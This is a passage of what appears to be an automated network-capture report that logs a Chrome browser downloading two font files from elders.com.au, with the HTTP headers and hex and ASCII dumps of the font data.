                                                                                                                                    Data Ascii: BCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abgsefjiyqlwkthxm}doDn~jc^_deab;nlm
                                                                                                                                    2024-11-05 08:03:21 UTC1369INData Raw: 5a ec 5a fe 5b 2a 5b 78 5b 9a 5b b2 5b d4 5b ee 5c 0c 5c 34 5c 62 5c 88 5c c6 5c fc 5d 42 5d 76 5d b8 5d fc 5e 14 5e 52 5e 88 5e a4 5e c6 5e ec 5f 38 5f 68 5f 9a 5f ee 60 18 60 5c 60 72 60 9e 60 ce 60 f4 61 1e 61 4e 61 74 61 84 61 96 61 b0 61 c8 62 62 62 f4 63 42 63 8a 63 e2 64 38 64 54 64 6e 64 8a 64 a8 64 ca 64 f0 65 10 65 38 65 5e 65 84 65 ac 65 d6 65 f8 66 24 66 30 66 42 66 74 66 a0 66 c8 66 f0 67 16 67 40 67 74 67 a6 67 e0 68 18 68 52 68 8a 68 d4 69 1c 69 42 69 70 69 d6 69 fa 6a 2c 6a 2c 6a 2c 6a 2c 6a 3a 6a 48 6a 56 6a 74 6a 94 6a b2 6a f0 6b 28 6b 5e 6b 74 6b 92 6b a4 6b d8 6c 3c 6c 4e 6c 60 6c 70 6c 9a 6c d2 6c fc 6d 2e 6d 4e 6d 8e 6d c4 6d ee 6e 06 6e 32 6e 68 6e 9e 6e c8 6e fa 6f 1a 6f 5a 6f 90 6f ce 70 0e 70 28 70 58 70 b4 70 f2 71 1c 71 4e 71
                                                                                                                                    Data Ascii: ZZ[*[x[[[[\\4\b\\\]B]v]]^^R^^^^_8_h__``\`r```aaNataaaabbbcBccd8dTdnddddee8e^eeeef$f0fBftfffgg@gtgghhRhhiiBipiij,j,j,j,j:jHjVjtjjjk(k^ktkkkl<lNl`lplllm.mNmmmnn2nhnnnooZoopp(pXppqqNq
                                                                                                                                    2024-11-05 08:03:21 UTC1369INData Raw: 07 00 00 33 11 21 11 25 21 11 21 42 01 a8 fe 8a 01 44 fe bc 02 b4 fd 4c 32 02 50 00 02 00 4b ff f6 00 dd 02 c2 00 03 00 0f 00 00 13 03 23 03 13 14 06 23 22 26 35 34 36 33 32 16 d5 18 54 19 8d 2c 1e 1f 29 2a 1f 1e 2b 02 c2 fe 12 01 db fd 91 1f 2b 2b 1f 1e 2b 2b 00 02 00 4b 01 ba 01 7a 02 c5 00 03 00 07 00 00 01 23 11 33 03 23 11 33 01 7a 66 66 c9 66 66 01 ba 01 0b fe f5 01 0b 00 00 02 00 23 00 00 02 13 02 c4 00 1b 00 1f 00 00 01 23 07 33 15 23 07 23 37 23 07 23 37 23 35 33 37 23 35 33 37 33 07 33 37 33 07 33 07 23 07 33 02 13 64 14 5a 64 1d 53 1d 70 1d 52 1c 58 63 13 59 64 1c 53 1d 70 1d 52 1c 5a b7 70 14 71 01 a9 8d 4d cf cf cf cf 4d 8d 4d ce ce ce ce 4d 8d 00 00 01 00 2d ff 9d 02 20 03 11 00 29 00 00 25 14 06 07 15 23 35 26 27 37 16 33 32 36 35 34 2f 01
                                                                                                                                    Data Ascii: 3!%!!BDL2PK##"&54632T,)*+++++Kz#3#3zffff##3##7##7#537#53733733#3dZdSpRXcYdSpRZpqMMMM- )%#5&'732654/
                                                                                                                                    2024-11-05 08:03:21 UTC1369INData Raw: 32 31 46 40 1a 0d 01 58 03 5b 29 31 37 41 27 2b 5f 49 6d 28 13 50 00 01 00 23 ff 45 01 fe 02 0b 00 27 00 00 25 23 22 2f 01 16 1d 01 07 35 34 36 35 07 22 23 21 35 13 33 03 06 07 36 3b 01 32 16 33 26 3f 02 15 14 07 32 36 3b 01 01 fe 2f 08 0b 0c 04 69 01 0e 0e 09 fe fc cd 73 a0 16 18 0c 13 78 06 1b 02 05 0c 08 56 03 01 1a 07 2b 08 01 01 0c 18 8f 12 a4 06 19 01 01 4e 01 b5 fe aa 30 24 03 01 25 7e 58 15 b9 42 15 01 00 01 00 37 ff 47 01 c7 01 fa 00 19 00 00 25 14 06 23 22 2f 01 16 33 32 36 35 34 26 23 22 07 13 21 07 23 07 36 33 32 16 01 c7 ad 82 29 21 17 2d 28 55 6f 45 39 3f 4a 20 01 40 10 cb 0f 23 16 5b 74 3f 6d 8b 08 50 0d 5d 46 36 3f 19 01 69 5d a3 05 69 00 00 00 02 00 3c ff f1 02 0e 02 c6 00 14 00 21 00 00 25 14 06 23 22 26 35 34 36 37 36 37 17 06 07 06 07
                                                                                                                                    Data Ascii: 21F@X[)17A'+_Im(P#E'%#"/5465"#!536;23&?26;/isxV+N0$%~XB7G%#"/32654&#"!#632)!-(UoE9?J @#[t?mP]F6?i]i<!%#"&546767
                                                                                                                                    2024-11-05 08:03:21 UTC1369INData Raw: b4 0e 14 32 56 38 4f 10 13 60 31 25 38 08 06 db 3e 01 5b 1e 2f 09 08 bd 0a 10 1c 00 00 00 01 00 37 ff f5 02 1e 02 c1 00 1a 00 00 25 06 23 22 27 26 35 34 37 3e 01 33 32 17 07 26 23 22 07 06 15 14 17 16 33 32 37 02 1e 50 6d 88 53 4f 2e 27 87 51 6b 41 35 35 41 5b 2f 24 1b 2d 6d 45 37 32 3d 64 60 97 7c 56 4a 55 36 4c 27 53 3f 77 71 3b 62 2c 00 02 00 55 00 00 02 40 02 b4 00 0c 00 17 00 00 01 14 07 0e 01 2b 01 11 33 32 16 17 16 07 34 27 2e 01 2b 01 11 33 32 36 02 40 49 2b 6b 61 ab 90 64 7c 30 4b 80 2c 18 3b 2f 49 4c 5a 51 01 58 9a 5d 37 2a 02 b4 2c 36 57 af 95 3c 21 1b fe 05 76 00 01 00 55 00 00 01 df 02 b4 00 0b 00 00 29 01 11 21 07 23 15 33 15 23 15 21 01 df fe 76 01 80 0f fc d3 d3 01 15 02 b4 5e bd 5f d8 00 01 00 55 00 00 01 c3 02 b4 00 09 00 00 01 07 23 15
                                                                                                                                    Data Ascii: 2V8O`1%8>[/7%#"'&547>32&#"327PmSO.'QkA55A[/$-mE72=d`|VJU6L'S?wq;b,U@+324'.+326@I+kad|0K,;/ILZQX]7*,6W<!vU)!#3#!v^_U#


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    75192.168.2.449842162.159.140.344435996C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    2024-11-05 08:03:21 UTC759OUTGET /etc.clientlibs/el/clientlibs/clientlib-react/resources/static/media/Meta-Pro-Bold.cebc7f85.ttf HTTP/1.1
                                                                                                                                    Host: elders.com.au
                                                                                                                                    Connection: keep-alive
                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                    Origin: https://elders.com.au
                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                    Accept: */*
                                                                                                                                    Sec-Fetch-Site: same-origin
                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                    Sec-Fetch-Dest: font
                                                                                                                                    Referer: https://elders.com.au/etc.clientlibs/el/clientlibs/clientlib-react.lc-3d0eb1ce53fb55bb5540e2cd4aabbacf-lc.min.css
                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                    Cookie: affinity="e47c197095b8b7ee"
                                                                                                                                    2024-11-05 08:03:21 UTC585INHTTP/1.1 200 OK
                                                                                                                                    Date: Tue, 05 Nov 2024 08:03:21 GMT
                                                                                                                                    Content-Type: font/ttf
                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                    Connection: close
                                                                                                                                    x-frame-options: SAMEORIGIN
                                                                                                                                    Cache-Control: public, max-age=86400
                                                                                                                                    last-modified: Tue, 29 Oct 2024 09:12:43 GMT
                                                                                                                                    etag: W/"35a98-62599fcdf98c0-gzip"
                                                                                                                                    x-vhost: publish-elders
                                                                                                                                    x-content-type-options: nosniff
                                                                                                                                    Age: 40187
                                                                                                                                    strict-transport-security: max-age=31557600
                                                                                                                                    x-served-by: cache-dfw-kdfw8210153-DFW
                                                                                                                                    x-cache: MISS
                                                                                                                                    x-timer: S1730285982.495027,VS0,VS0,VE1020
                                                                                                                                    vary: Accept-Encoding
                                                                                                                                    CF-Cache-Status: HIT
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 8ddb53ac2ed9e972-DFW
                                                                                                                                    2024-11-05 08:03:21 UTC784INData Raw: 37 64 35 35 0d 0a 00 01 00 00 00 0f 00 80 00 03 00 70 46 46 54 4d 87 3e 07 4d 00 03 5a 7c 00 00 00 1c 47 44 45 46 00 25 00 00 00 02 2e 9c 00 00 00 18 47 50 4f 53 1a 53 4f cc 00 02 50 88 00 01 09 f2 47 53 55 42 7a e9 67 ad 00 02 2e b4 00 00 21 d4 4f 53 2f 32 8d 09 73 3c 00 00 01 78 00 00 00 60 63 6d 61 70 a1 46 2a 47 00 00 14 b0 00 00 05 6a 67 61 73 70 ff ff 00 03 00 02 2e 94 00 00 00 08 67 6c 79 66 54 84 e2 ba 00 00 23 8c 00 01 be 24 68 65 61 64 0f ec 4b 10 00 00 00 fc 00 00 00 36 68 68 65 61 07 c0 07 7e 00 00 01 34 00 00 00 24 68 6d 74 78 3a 34 b8 2f 00 00 01 d8 00 00 12 d8 6c 6f 63 61 80 e9 11 36 00 00 1a 1c 00 00 09 6e 6d 61 78 70 05 01 00 70 00 00 01 58 00 00 00 20 6e 61 6d 65 ba ac 19 93 00 01 e1 b0 00 00 20 7f 70 6f 73 74 9d 72 bf 80 00 02 02 30 00
                                                                                                                                    Data Ascii: 7d55pFFTM>MZ|GDEF%.GPOSSOPGSUBzg.!OS/2s<x`cmapF*Gjgasp.glyfT#$headK6hhea~4$hmtx:4/loca6nmaxppX name postr0
                                                                                                                                    2024-11-05 08:03:21 UTC1369INData Raw: 00 41 01 1c 00 3c 01 1b 00 0a 02 0f 00 42 01 23 00 44 03 23 00 38 02 2a 00 39 02 1f 00 28 02 32 00 43 02 31 00 2d 01 65 00 38 01 eb 00 1e 01 5f 00 18 02 22 00 46 01 da ff fb 02 c5 00 05 01 fe ff f6 01 fb 00 00 01 df 00 23 01 88 00 19 01 14 00 4b 01 88 00 19 02 32 00 32 00 e1 00 00 01 31 00 46 01 d1 00 2d 02 51 00 2d 01 bf 00 1f 02 38 ff f8 01 14 00 4b 02 56 00 2d 01 da 00 37 03 42 00 2d 01 b3 00 23 02 28 00 1e 02 13 00 2d 01 4a 00 2d 03 42 00 2d 01 6c 00 19 01 9b 00 23 02 01 00 2d 01 80 00 23 01 78 00 23 01 4f 00 23 02 22 00 46 02 5a 00 19 01 0c 00 2d 01 32 00 37 01 44 00 23 01 b3 00 23 02 28 00 1e 03 b2 00 23 03 b0 00 23 03 e6 00 23 01 e4 00 3c 02 50 ff fd 02 50 ff fd 02 50 ff fd 02 50 ff fd 02 50 ff fd 02 50 ff fd 03 5b ff f1 02 3e 00 2d 01 f9 00 4b 01
                                                                                                                                    Data Ascii: A<B#D#8*9(2C1-e8_"F#K221F-Q-8KV-7B-#(-J-B-l#-#x#O#"FZ-27D##(###<PPPPPP[>-K
                                                                                                                                    2024-11-05 08:03:21 UTC1369INData Raw: 47 02 1d 00 35 02 33 00 2d 02 50 00 4b 02 02 ff fb 02 1f 00 28 01 f6 00 2d 01 e3 00 32 02 2f 00 39 02 1f 00 2a 01 20 00 42 02 06 00 42 02 08 00 07 02 22 00 46 01 da ff fb 01 f2 00 2d 02 1f 00 28 02 2f 00 14 02 0f 00 28 01 d3 00 2d 02 2e 00 28 01 9f 00 09 02 1d 00 46 02 bb 00 28 01 fe ff f6 02 a9 00 3c 02 c5 00 28 01 20 ff dd 02 1d 00 4b 02 1f 00 28 02 1d 00 4b 02 c5 00 2d 02 50 00 3e 02 31 00 28 02 00 ff ec 02 00 ff 0f 02 00 ff ec 02 ae 00 28 01 f9 00 4b 01 f9 00 4b 02 bf 00 0f 01 bc 00 4b 02 3f 00 2d 02 52 00 23 01 28 00 4b 01 28 ff de 01 29 ff f1 03 9e ff fb 03 a6 00 4b 02 c1 00 0f 02 7f 00 4b 02 8a 00 4b 02 27 ff fb 02 69 00 4b 02 50 ff fd 02 66 00 4b 02 62 00 4b 01 bc 00 4b 02 94 00 05 01 f9 00 4b 03 ab 00 19 02 21 00 0f 02 8a 00 4b 02 8a 00 4b 02 7f
                                                                                                                                    Data Ascii: G53-PK(-2/9* BB"F-(/(-.(F(<( K(K-P>1((KKK?-R#(K()KKK'iKPfKbKKK!KK
                                                                                                                                    2024-11-05 08:03:21 UTC1369INData Raw: 02 1a 00 19 02 33 00 23 01 f4 00 23 02 3f 00 2d 01 fe 00 1e 02 5d 00 2d 02 36 00 28 01 d1 00 2d 02 51 00 2d 01 bf 00 1f 02 38 ff f8 02 7a 00 23 02 52 00 2e 01 f5 00 0f 02 40 ff ff 02 6e 00 31 02 3a 00 2f 02 3a 00 67 02 3a 00 34 02 3a 00 33 02 3a 00 26 02 3a 00 4b 02 3a 00 2a 02 3a 00 3d 02 3a 00 1b 02 3a 00 2c 02 6e 00 71 02 6e 00 2c 02 6e 00 7a 02 6e 00 13 02 3a 00 00 02 6e 00 18 02 6e 00 3b 02 3a 00 22 02 3a 00 09 03 8e 00 55 04 c5 00 55 02 d9 00 55 03 dd 00 28 02 0c ff fd 02 33 00 55 02 15 00 37 02 4b 00 55 01 e8 00 55 01 c7 00 55 02 64 00 37 02 51 00 55 01 37 00 55 01 37 00 05 02 3a 00 55 01 b7 00 55 03 07 00 41 02 51 00 55 02 81 00 37 02 15 00 55 02 81 00 37 02 2d 00 55 02 21 00 28 01 c6 00 0f 02 61 00 53 02 01 ff f1 02 ec 00 05 02 04 ff f6 01 e2 ff
                                                                                                                                    Data Ascii: 3##?-]-6(-Q-8z#R.@n1:/:g:4:3:&:K:*:=::,nqn,nzn:nn;:":UUU(3U7KUUUd7QU7U7:UUAQU7U7-U!(aS
                                                                                                                                    2024-11-05 08:03:21 UTC1369INData Raw: 55 00 23 04 bb 00 19 04 bb 00 97 04 bb 00 19 04 bb 00 97 04 bb 00 5f 04 bb 00 5f 04 bb 00 5f 04 bb 00 5f 02 00 ff 0f 02 00 ff ec 02 00 ff ec 02 50 00 3e 02 31 00 28 02 ae 00 28 02 00 ff ec 01 d4 ff f1 01 d4 ff f1 01 d4 ff f1 01 d4 ff f1 03 00 00 0d 02 83 00 69 02 83 00 69 04 14 00 0f 05 0d 00 0f 04 07 00 2d 04 14 00 2d 03 e4 00 2d 02 f8 00 2d 03 43 00 2d 01 d0 00 6f 00 01 ff f4 00 01 00 02 00 01 00 2c 00 01 fe 93 00 01 fe 5e 00 01 00 00 01 26 00 39 01 26 00 39 02 3e 00 77 02 6a 00 88 02 8a 00 a0 01 26 00 39 03 6c 00 1d 02 58 00 1d 03 78 00 1d 03 8c 00 1d 03 cf 00 1d 03 79 00 1d 02 4a 00 1d 02 56 00 1d 03 49 00 1d 02 8e 00 1d 03 58 00 1d 03 29 00 1d 04 14 00 1d 03 4a 00 1d 03 38 00 41 02 1f 00 62 02 1f 00 59 01 6c 00 19 02 1f 00 98 02 1f 00 5a 01 df 00 3d
                                                                                                                                    Data Ascii: U#____P>1((ii----C-o,^&9&9>wj&9lXxyJVIX)J8AbYlZ=
                                                                                                                                    2024-11-05 08:03:21 UTC1369INData Raw: 00 0e 00 0f 00 10 00 11 00 12 00 13 00 14 00 15 00 16 00 17 00 18 00 19 00 1a 00 1b 00 1c 00 1d 00 1e 00 1f 00 20 00 21 00 22 00 23 00 24 00 25 00 26 00 27 00 28 00 29 00 2a 00 2b 00 2c 00 2d 00 2e 00 2f 00 30 00 31 00 32 00 33 00 34 00 35 00 36 00 37 00 38 00 39 00 3a 00 3b 00 3c 00 3d 00 3e 00 3f 00 40 00 41 00 42 00 43 00 44 00 45 00 46 00 47 00 48 00 49 00 4a 00 4b 00 4c 00 4d 00 4e 00 4f 00 50 00 51 00 52 00 53 00 54 00 55 00 56 00 57 00 58 00 59 00 5a 00 5b 00 5c 00 5d 00 5e 00 5f 00 60 00 61 00 62 00 00 00 87 00 88 00 8a 00 8c 00 94 00 99 00 9f 00 a4 00 a3 00 a5 00 a7 00 a6 00 a8 00 aa 00 ac 00 ab 00 ad 00 ae 00 b0 00 af 00 b1 00 b2 00 b4 00 b6 00 b5 00 b7 00 b9 00 b8 00 bd 00 bc 00 be 00 bf 02 67 00 73 00 65 00 66 00 6a 02 69 00 79 00 a2 00 71 00
                                                                                                                                    Data Ascii: !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abgsefjiyq
                                                                                                                                    2024-11-05 08:03:21 UTC1369INData Raw: 64 56 8c 56 d6 56 ec 57 0e 57 38 57 7c 57 8c 57 b8 57 ce 58 5e 58 9e 58 be 58 f4 59 44 59 6e 59 9c 59 b2 59 ea 59 fc 5a 26 5a 54 5a 66 5a 9a 5a e4 5a fe 5b 16 5b 36 5b 4e 5b 6a 5b 94 5b c2 5b e8 5c 18 5c 50 5c 98 5c da 5d 26 5d 64 5d 74 5d 9e 5d ce 5e 56 5e a4 5e c2 5e fa 5f 44 5f 72 5f 9e 5f b4 5f e2 5f f4 60 2c 60 5a 60 6c 60 9a 60 e8 61 10 61 28 61 4a 61 64 61 82 61 aa 61 d6 61 fc 62 38 62 70 62 b4 62 ec 63 3a 63 78 63 8e 63 ca 64 06 64 1e 64 46 64 6c 64 b2 64 e2 65 14 65 66 65 8c 65 d2 65 ea 66 18 66 46 66 72 66 a6 66 ce 66 f2 67 04 67 14 67 2e 67 46 67 d4 68 5c 68 a8 68 f2 69 46 69 94 69 b0 69 ca 69 e6 6a 02 6a 24 6a 46 6a 66 6a 92 6a b8 6a de 6b 08 6b 2c 6b 4e 6b 7a 6b 86 6b 98 6b ca 6b fa 6c 22 6c 48 6c 74 6c a8 6c e4 6d 18 6d 52 6d 8c 6d c6 6e 00
                                                                                                                                    Data Ascii: dVVVWW8W|WWWX^XXXYDYnYYYYZ&ZTZfZZZ[[6[N[j[[[\\P\\]&]d]t]]^V^^^_D_r____`,`Z`l``aa(aJadaaaab8bpbbc:cxccdddFdlddeefeeeffFfrfffggg.gFgh\hhiFiiiijj$jFjfjjjkk,kNkzkkkkl"lHltllmmRmmn
                                                                                                                                    2024-11-05 08:03:21 UTC1369INData Raw: d4 02 d4 30 d4 70 d4 b2 d4 e4 d5 32 d5 7c d5 c6 d5 d4 d5 f8 d6 06 d6 14 d6 26 d6 38 d6 52 d6 66 d6 8a d6 a6 d6 bc d6 d0 d7 24 d7 a0 d8 34 d8 a2 d9 02 d9 68 d9 e8 da 56 da 96 db 02 db 3a db 7e db c2 dc 1e dc 72 dc d4 dd 1c dd 54 dd ac dd fa de 08 de 2c de 3a de 48 de 5a de 6c de 86 de 9a de bc de d8 de ee de fc df 12 00 00 00 02 00 39 00 00 01 f1 02 b7 00 03 00 07 00 00 33 11 21 11 25 21 11 21 39 01 b8 fe 7a 01 54 fe ac 02 b7 fd 49 32 02 53 00 02 00 46 ff f3 00 eb 02 c6 00 03 00 0e 00 00 13 03 23 03 12 14 06 23 22 26 35 34 36 33 32 e7 1c 66 1e a4 31 23 22 2f 30 23 22 02 c6 fe 17 01 d2 fd b9 44 31 30 23 22 31 00 00 00 00 02 00 46 01 aa 01 ac 02 c4 00 03 00 07 00 00 01 23 11 33 03 23 11 33 01 ac 7e 7e e8 7e 7e 01 aa 01 1a fe e6 01 1a 00 00 02 00 23 00 00 02
                                                                                                                                    Data Ascii: 0p2|&8Rf$4hV:~rT,:HZl93!%!!9zTI2SF##"&54632f1#"/0#"D10#"1F#3#3~~~~#
                                                                                                                                    2024-11-05 08:03:21 UTC1369INData Raw: 78 94 91 79 78 94 91 7c 62 49 a7 62 49 00 00 00 01 00 1e 00 00 01 89 02 0a 00 0b 00 00 29 01 35 33 11 06 07 27 37 33 11 33 01 89 fe c3 6c 3d 3b 22 c1 5a 50 6d 01 03 26 14 48 8c fe 63 00 00 00 01 00 2d 00 00 01 ff 02 10 00 1d 00 00 25 07 21 35 3e 01 37 3e 01 35 34 26 23 22 07 27 36 33 32 16 15 14 07 0e 02 0f 01 36 33 01 ff 1d fe 5f 05 3f 23 63 4a 2c 24 3a 4e 50 6f 8d 59 6a 5e 10 30 3c 0d 1a 25 3c 70 70 7a 03 1d 14 38 4c 25 20 23 40 53 63 5a 4a 5c 46 0c 1d 21 08 0d 05 00 00 00 01 00 23 ff 48 01 f7 02 0b 00 29 00 00 25 14 06 23 22 2f 01 16 33 32 36 35 34 27 26 23 22 07 35 16 33 32 35 34 26 23 22 07 27 36 37 36 33 32 16 15 14 07 06 07 1e 01 01 f7 c5 9b 2d 26 20 24 28 68 82 2c 1d 40 25 0e 20 25 6f 2b 2a 51 43 46 2c 31 49 46 5e 7a 42 10 15 38 3f 32 67 83 05 5d
                                                                                                                                    Data Ascii: xyx|bIbI)53'733l=;"ZPm&Hc-%!5>7>54&#"'63263_?#cJ,$:NPoYj^0<%<ppz8L% #@ScZJ\F!#H)%#"/32654'&#"53254&#"'67632-& $(h,@% %o+*QCF,1IF^zB8?2g]
                                                                                                                                    2024-11-05 08:03:21 UTC1369INData Raw: 22 26 35 34 36 33 32 17 06 07 06 15 14 16 33 32 36 35 34 26 23 22 06 15 14 16 33 32 37 17 06 23 22 26 35 34 3e 01 33 32 16 05 26 23 22 06 15 14 33 32 36 37 03 58 85 5e 24 2f 16 08 02 43 53 3e 45 9a 82 41 4d 14 2b 08 14 18 2e 3c 99 7e 78 af 9d 78 4e 42 12 56 4c af dd 6a bf 75 aa e3 fe c8 0f 15 52 53 2a 22 4c 0c 01 14 81 a6 0f 1d 1b 15 50 4d 49 83 b8 29 43 ca 26 11 14 0f 7a 60 77 91 c7 8c 86 9b 16 55 1c cc b0 75 c4 74 c5 3d 07 91 5f 3f 45 38 00 00 00 02 ff fd 00 00 02 53 02 b9 00 07 00 11 00 00 21 23 27 23 07 23 13 33 03 26 2f 01 0e 02 07 06 07 02 53 96 31 cc 31 92 e4 97 0e 13 13 1c 01 0c 0f 05 14 11 a5 a5 02 b9 fe 60 39 53 7b 04 33 3b 14 4d 34 00 00 03 00 4b 00 00 02 35 02 b7 00 13 00 1f 00 2c 00 00 25 14 06 07 06 2b 01 11 33 32 16 17 16 15 14 07 06 07 1e
                                                                                                                                    Data Ascii: "&5463232654&#"327#"&54>32&#"3267X^$/CS>EAM+.<~xxNBVLjuRS*"LPMI)C&z`wUut=_?E8S!#'##3&/S11`9S{3;M4K5,%+32


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    76192.168.2.449843162.159.140.344435996C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    2024-11-05 08:03:21 UTC761OUTGET /etc.clientlibs/el/clientlibs/clientlib-react/resources/static/media/Meta-Pro-Normal.a1cecbde.ttf HTTP/1.1
                                                                                                                                    Host: elders.com.au
                                                                                                                                    Connection: keep-alive
                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                    Origin: https://elders.com.au
                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                    Accept: */*
                                                                                                                                    Sec-Fetch-Site: same-origin
                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                    Sec-Fetch-Dest: font
                                                                                                                                    Referer: https://elders.com.au/etc.clientlibs/el/clientlibs/clientlib-react.lc-3d0eb1ce53fb55bb5540e2cd4aabbacf-lc.min.css
                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                    Cookie: affinity="e47c197095b8b7ee"
                                                                                                                                    2024-11-05 08:03:21 UTC579INHTTP/1.1 200 OK
                                                                                                                                    Date: Tue, 05 Nov 2024 08:03:21 GMT
                                                                                                                                    Content-Type: font/ttf
                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                    Connection: close
                                                                                                                                    x-frame-options: SAMEORIGIN
                                                                                                                                    Cache-Control: public, max-age=86400
                                                                                                                                    last-modified: Tue, 29 Oct 2024 09:12:43 GMT
                                                                                                                                    etag: W/"378b0-62599fcdf98c0-gzip"
                                                                                                                                    x-vhost: publish-elders
                                                                                                                                    x-content-type-options: nosniff
                                                                                                                                    strict-transport-security: max-age=31557600
                                                                                                                                    x-served-by: cache-sjc1000106-SJC
                                                                                                                                    x-cache: MISS
                                                                                                                                    x-timer: S1730264596.442895,VS0,VS0,VE882
                                                                                                                                    vary: Accept-Encoding
                                                                                                                                    CF-Cache-Status: HIT
                                                                                                                                    Age: 17536
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 8ddb53ac2b2e2ccd-DFW
                                                                                                                                    2024-11-05 08:03:21 UTC790INData Raw: 37 64 35 62 0d 0a 00 01 00 00 00 0f 00 80 00 03 00 70 46 46 54 4d 87 c9 4a b0 00 03 78 94 00 00 00 1c 47 44 45 46 2a 09 2e 08 00 02 36 f4 00 00 00 66 47 50 4f 53 09 82 40 e1 00 02 58 e0 00 01 1f b4 47 53 55 42 f2 d5 10 22 00 02 37 5c 00 00 21 82 4f 53 2f 32 8a 02 70 2a 00 00 01 78 00 00 00 60 63 6d 61 70 17 d9 cb 33 00 00 14 a8 00 00 05 1e 67 61 73 70 ff ff 00 03 00 02 36 ec 00 00 00 08 67 6c 79 66 b7 b9 bc 88 00 00 23 34 00 01 c7 6c 68 65 61 64 0f 61 50 9d 00 00 00 fc 00 00 00 36 68 68 65 61 07 36 08 b2 00 00 01 34 00 00 00 24 68 6d 74 78 ef 65 ce ea 00 00 01 d8 00 00 12 d0 6c 6f 63 61 83 5f 12 04 00 00 19 c8 00 00 09 6a 6d 61 78 70 05 04 00 a3 00 00 01 58 00 00 00 20 6e 61 6d 65 e0 36 6e 52 00 01 ea a0 00 00 20 01 70 6f 73 74 d9 49 30 6b 00 02 0a a4 00
                                                                                                                                    Data Ascii: 7d5bpFFTMJxGDEF*.6fGPOS@XGSUB"7\!OS/2p*x`cmap3gasp6glyf#4lheadaP6hhea64$hmtxeloca_jmaxpX name6nR postI0k
                                                                                                                                    2024-11-05 08:03:21 UTC1369INData Raw: 01 0e 00 14 02 02 00 52 01 0d 00 53 03 2c 00 4d 02 2c 00 4c 02 25 00 3c 02 39 00 54 02 39 00 41 01 44 00 4e 01 e1 00 37 01 40 00 1e 02 2d 00 5a 01 d9 00 0f 02 b7 00 14 01 d3 00 05 01 cb 00 0f 01 cb 00 2d 01 4b 00 2d 01 00 00 5f 01 4b 00 19 02 4e 00 41 00 e6 00 00 01 24 00 55 01 d5 00 41 02 33 00 37 01 c9 00 3a 02 1b 00 05 01 00 00 5f 02 24 00 41 01 a4 00 37 03 6a 00 41 01 ad 00 37 01 f8 00 41 01 f3 00 37 01 2d 00 37 03 6a 00 41 01 44 00 19 01 9c 00 2d 01 e1 00 37 01 66 00 2d 01 6b 00 2d 01 68 00 37 02 2e 00 5a 02 59 00 23 01 2d 00 55 01 22 00 37 01 45 00 2d 01 b0 00 37 01 f8 00 37 03 b6 00 2d 03 9d 00 2d 03 e1 00 2d 01 b6 00 37 02 47 00 0a 02 47 00 0a 02 47 00 0a 02 47 00 0a 02 47 00 0a 02 47 00 0a 03 75 00 05 02 3d 00 41 02 08 00 5f 02 08 00 5f 02 08 00
                                                                                                                                    Data Ascii: RS,M,L%<9T9ADN7@-Z-K-_KNA$UA37:_$A7jA7A7-7jAD-7f-k-h7.ZY#-U"7E-77---7GGGGGGu=A__
                                                                                                                                    2024-11-05 08:03:21 UTC1369INData Raw: 3e 00 41 02 35 00 5a 01 e6 00 00 02 25 00 3c 01 f9 00 3e 01 c0 00 41 02 2c 00 4c 02 30 00 46 01 06 00 4d 01 f4 00 52 01 ed 00 1d 02 2e 00 5a 01 d9 00 0f 01 e2 00 41 02 25 00 3c 02 26 00 2d 02 1b 00 46 01 c8 00 41 02 35 00 3c 01 95 00 14 02 20 00 56 02 ba 00 3b 01 d3 00 05 02 ab 00 52 02 b5 00 3c 01 06 00 02 02 20 00 56 02 25 00 3c 02 20 00 56 02 b5 00 3c 02 35 00 4b 02 15 00 3c 01 e1 ff fb 01 e1 ff 26 01 e1 ff fb 02 c0 00 4b 02 08 00 5f 02 08 00 5f 02 94 ff fb 01 a0 00 5f 02 4b 00 41 02 43 00 37 01 0e 00 5f 01 0e ff f2 01 17 00 03 03 7e 00 08 03 a1 00 5f 02 90 ff fb 02 5c 00 5f 02 9b 00 5f 01 df ff ef 02 6a 00 5f 02 47 00 0a 02 57 00 5f 02 61 00 5f 01 a0 00 5f 02 65 00 0a 02 08 00 5f 03 7a 00 20 02 23 00 1e 02 9b 00 5f 02 9b 00 5f 02 5c 00 5f 02 57 00 08
                                                                                                                                    Data Ascii: >A5Z%<>A,L0FMR.ZA%<&-FA5< V;R< V%< V<5K<&K___KAC7_~_\__j_GW_a__e_z #__\_W
